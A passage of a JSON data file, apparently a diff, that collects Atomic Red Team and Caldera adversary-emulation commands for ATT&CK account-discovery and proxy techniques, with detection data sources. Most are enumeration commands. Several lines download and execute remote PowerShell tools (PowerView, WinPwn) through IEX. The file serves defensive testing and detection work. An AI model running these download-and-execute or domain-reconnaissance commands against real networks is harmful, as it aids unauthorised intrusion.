"319e9f6c-7a9e-432e-8c62-9385c803b6f2", + "description": "Utilize local utilities to enumerate users and groups\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "dscl . list /Groups\ndscl . list /Users\ndscl . list /Users | grep -v '_'\ndscacheutil -q group\ndscacheutil -q user\n", + "name": "sh" + } + }, + { + "name": "Enumerate all accounts on Windows (Local)", + "auto_generated_guid": "80887bec-5a9b-4efc-a81d-f83eb2eb32ab", + "description": "Enumerate all accounts\nUpon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net user\ndir c:\\Users\\\ncmdkey.exe /list\nnet localgroup \"Users\"\nnet localgroup\n", + "name": "command_prompt" + } + }, + { + "name": "Enumerate all accounts via PowerShell (Local)", + "auto_generated_guid": "ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b", + "description": "Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net user\nget-localuser\nget-localgroupmember -group Users\ncmdkey.exe /list\nls C:/Users\nget-childitem C:\\Users\\\ndir C:\\Users\\\nget-localgroup\nnet localgroup\n", + "name": "powershell" + } + }, + { + "name": "Enumerate logged on users via CMD (Local)", + "auto_generated_guid": "a138085e-bfe5-46ba-a242-74a6fb884af3", + "description": "Enumerate logged on users. 
Upon execution, logged on users will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "query user\n", + "name": "command_prompt" + } + } + ] + }, + { + "id": "c1cd6388-3ced-48c7-a511-0434c6ba8f48", + "name": "Find local users", + "description": "Get a list of all local users", + "tactic": "discovery", + "technique": { + "attack_id": "T1087.001", + "name": "Account Discovery: Local Account" + }, + "platforms": { + "darwin": { + "sh": { + "command": "cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.user.name" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.user.name" + } + ] + } + } + } + } + }, + { + "id": "feaced8f-f43f-452a-9500-a5219488abb8", + "name": "Identify local users", + "description": "Identify all local users", + "tactic": "discovery", + "technique": { + "attack_id": "T1087.001", + "name": "Account Discovery: Local Account" + }, + "platforms": { + "darwin": { + "sh": { + "command": "dscl . 
list /Users | grep -v '_'\n" + } + }, + "windows": { + "psh": { + "command": "Get-WmiObject -Class Win32_UserAccount\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": 
"user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1087.002", + "command_list": [ + "net user /domain\nnet group /domain\n", + "net user /domain\nget-localgroupmember -group Users\nget-aduser -filter *\n", + "query user /SERVER:$env:COMPUTERNAME\n", + "Invoke-Expression $env:TEMP\\ADRecon.ps1\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -sc admincountdmp\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=person)\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -sc exchaddresses\n", + "net user administrator /domain\n", + "Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server $env:UserDnsDomain\n", + null, + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 
'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose\n", + "([adsisearcher]\"objectcategory=user\").FindAll(); ([adsisearcher]\"objectcategory=user\").FindOne()\n", + "(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] OU Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n", + "(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] Domain Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ngeneraldomaininfo -noninteractive -consoleoutput", + "net user #{domain.user.name} /domain", + "net user /domain" + ], + "commands": [ + { + "command": "net user /domain\nnet group /domain\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "net user /domain\nget-localgroupmember -group Users\nget-aduser -filter *\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "query user /SERVER:$env:COMPUTERNAME\n", + "source": "atomics/T1087.002/T1087.002.yaml", 
+ "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "Invoke-Expression $env:TEMP\\ADRecon.ps1\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -sc admincountdmp\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=person)\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -sc exchaddresses\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "net user administrator /domain\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server $env:UserDnsDomain\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": null, + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 
'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "([adsisearcher]\"objectcategory=user\").FindAll(); ([adsisearcher]\"objectcategory=user\").FindOne()\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] OU Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] Domain Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ngeneraldomaininfo -noninteractive -consoleoutput", + "source": 
"atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "net user #{domain.user.name} /domain", + "source": "data/abilities/discovery/364ea817-bbb9-4083-87dd-94b9dba45f6f.yml", + "name": "The net utility is executed via cmd to enumerate detailed information about a specific user account." + }, + { + "command": "net user /domain", + "source": "data/abilities/discovery/c7ec57cd-933e-42b6-99a4-e852a9e57a33.yml", + "name": "The net utility is executed via cmd to enumerate domain user accounts." + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1087.002", + "display_name": "Account Discovery: Domain Account", + "atomic_tests": [ + { + "name": "Enumerate all accounts (Domain)", + "auto_generated_guid": "6fbc9e68-5ad7-444a-bd11-8bf3136c477e", + "description": "Enumerate all accounts\nUpon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net user /domain\nnet group /domain\n", + "name": "command_prompt" + } + }, + { + "name": "Enumerate all accounts via PowerShell (Domain)", + "auto_generated_guid": "8b8a6449-be98-4f42-afd2-dedddc7453b2", + "description": "Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net user /domain\nget-localgroupmember -group Users\nget-aduser -filter *\n", + "name": "powershell" + } + }, + { + "name": "Enumerate logged on users via CMD (Domain)", + "auto_generated_guid": "161dcd85-d014-4f5e-900c-d3eaae82a0f7", + "description": "Enumerate logged on users. 
Upon exeuction, logged on users will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "computer_name": { + "description": "Name of remote system to query", + "type": "String", + "default": "$env:COMPUTERNAME" + } + }, + "executor": { + "command": "query user /SERVER:#{computer_name}\n", + "name": "command_prompt" + } + }, + { + "name": "Automated AD Recon (ADRecon)", + "auto_generated_guid": "95018438-454a-468c-a0fa-59c800149b59", + "description": "ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its\npath will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adrecon_path": { + "description": "Path of ADRecon.ps1 file", + "type": "Path", + "default": "$env:TEMP\\ADRecon.ps1" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ADRecon must exist on disk at specified location (#{adrecon_path})\n", + "prereq_command": "if (Test-Path #{adrecon_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1\" -OutFile #{adrecon_path}\n" + } + ], + "executor": { + "command": "Invoke-Expression #{adrecon_path}\n", + "cleanup_command": "Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null\nGet-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match \"^ADRecon-Report-\"} | Remove-Item -Force -Recurse\n", + "name": "powershell" + } + }, + { + "name": "Adfind -Listing password policy", + "auto_generated_guid": "736b4f53-f400-4c22-855d-1a6b5a551600", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. 
The example chosen illustrates adfind used to query the local password policy.\nreference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties\n", + "name": "command_prompt" + } + }, + { + "name": "Adfind - Enumerate Active Directory Admins", + "auto_generated_guid": "b95fd967-4e62-4109-b48d-265edfd28c3a", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. 
This example has been documented by ransomware actors enumerating Active Directory Admin accounts\nreference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -sc admincountdmp\n", + "name": "command_prompt" + } + }, + { + "name": "Adfind - Enumerate Active Directory User Objects", + "auto_generated_guid": "e1ec8d20-509a-4b9a-b820-06c9b2da8eb7", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. 
This example has been documented by ransomware actors enumerating Active Directory User Objects\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -f (objectcategory=person)\n", + "name": "command_prompt" + } + }, + { + "name": "Adfind - Enumerate Active Directory Exchange AD Objects", + "auto_generated_guid": "5e2938fb-f919-47b6-8b29-2f6a1f718e99", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. 
This example has been documented by ransomware actors enumerating Active Directory Exchange Objects\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -sc exchaddresses\n", + "name": "command_prompt" + } + }, + { + "name": "Enumerate Default Domain Admin Details (Domain)", + "auto_generated_guid": "c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef", + "description": "This test will enumerate the details of the built-in domain admin account\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net user administrator /domain\n", + "name": "command_prompt" + } + }, + { + "name": "Enumerate Active Directory for Unconstrained Delegation", + "auto_generated_guid": "46f8dbe9-22a5-4770-8513-66119c5be63b", + "description": "Attackers may attempt to query for computer objects with the UserAccountControl property\n'TRUSTED_FOR_DELEGATION' (0x80000;524288) set\nMore Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce\nPrerequisite: AD RSAT PowerShell module is needed and it must run under a domain user\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": 
"Domain FQDN", + "type": "String", + "default": "$env:UserDnsDomain" + }, + "uac_prop": { + "description": "UAC Property to search", + "type": "String", + "default": 524288 + } + }, + "dependencies": [ + { + "description": "PowerShell ActiveDirectory Module must be installed\n", + "prereq_command": "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n}\nCatch {\n exit 1\n}\n", + "get_prereq_command": "if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {\n Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online\n} else {\n Install-WindowsFeature RSAT-AD-PowerShell\n}\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}\n" + } + }, + { + "name": "Get-DomainUser with PowerView", + "auto_generated_guid": "93662494-5ed7-4454-a04c-8c8372808ac2", + "description": "Utilizing PowerView, run Get-DomainUser to identify the domain users. 
Upon execution, Users within the domain will be listed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose\n", + "name": "powershell" + } + }, + { + "name": "Enumerate Active Directory Users with ADSISearcher", + "auto_generated_guid": "02e8be5a-3065-4e54-8cc8-a14d138834d3", + "description": "The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.\nUpon successful execution a listing of users will output with their paths in AD.\nReference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "([adsisearcher]\"objectcategory=user\").FindAll(); ([adsisearcher]\"objectcategory=user\").FindOne()\n" + } + }, + { + "name": "Enumerate Linked Policies In ADSISearcher Discovery", + "auto_generated_guid": "7ab0205a-34e4-4a44-9b04-e1541d1a57be", + "description": "The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory.\nUpon successful execution a listing of users will output with their paths in AD.\nReference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] OU Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy 
Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n" + } + }, + { + "name": "Enumerate Root Domain linked policies Discovery", + "auto_generated_guid": "00c652e2-0750-4ca6-82ff-0204684a6fe4", + "description": "The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory.\nUpon successful execution a listing of users will output with their paths in AD.\nReference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] Domain Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n" + } + }, + { + "name": "WinPwn - generaldomaininfo", + "auto_generated_guid": "ce483c35-c74b-45a7-a670-631d1e69db3d", + "description": "Gathers general domain information using the generaldomaininfo function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ngeneraldomaininfo -noninteractive -consoleoutput", + "name": "powershell" + } + } + ] + }, + { + "id": "364ea817-bbb9-4083-87dd-94b9dba45f6f", + "name": "Account Discovery (targeted)", + "description": "The net utility is executed via cmd to enumerate detailed information about a 
specific user account.", + "tactic": "discovery", + "technique": { + "attack_id": "T1087.002", + "name": "Account Discovery: Domain Account" + }, + "platforms": { + "windows": { + "cmd,psh": { + "command": "net user #{domain.user.name} /domain" + } + } + } + }, + { + "id": "c7ec57cd-933e-42b6-99a4-e852a9e57a33", + "name": "Account Discovery (all)", + "description": "The net utility is executed via cmd to enumerate domain user accounts.", + "tactic": "discovery", + "technique": { + "attack_id": "T1087.002", + "name": "Account Discovery: Domain Account" + }, + "platforms": { + "windows": { + "cmd": { + "command": "net user /domain" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + 
"target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1090.001", + "command_list": [ + "export #{proxy_scheme}_proxy=127.0.0.1:8080\n", + "export http_proxy=#{proxy_server}\n", + "networksetup -setwebproxy #{interface} 127.0.0.1 #{proxy_port}\nnetworksetup -setsecurewebproxy #{interface} 127.0.0.1 #{proxy_port}\n", + null, + "networksetup -setwebproxy Wi-Fi #{proxy_server} #{proxy_port}\nnetworksetup -setsecurewebproxy Wi-Fi #{proxy_server} #{proxy_port}\n", + "netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=127.0.0.1", + "netsh 
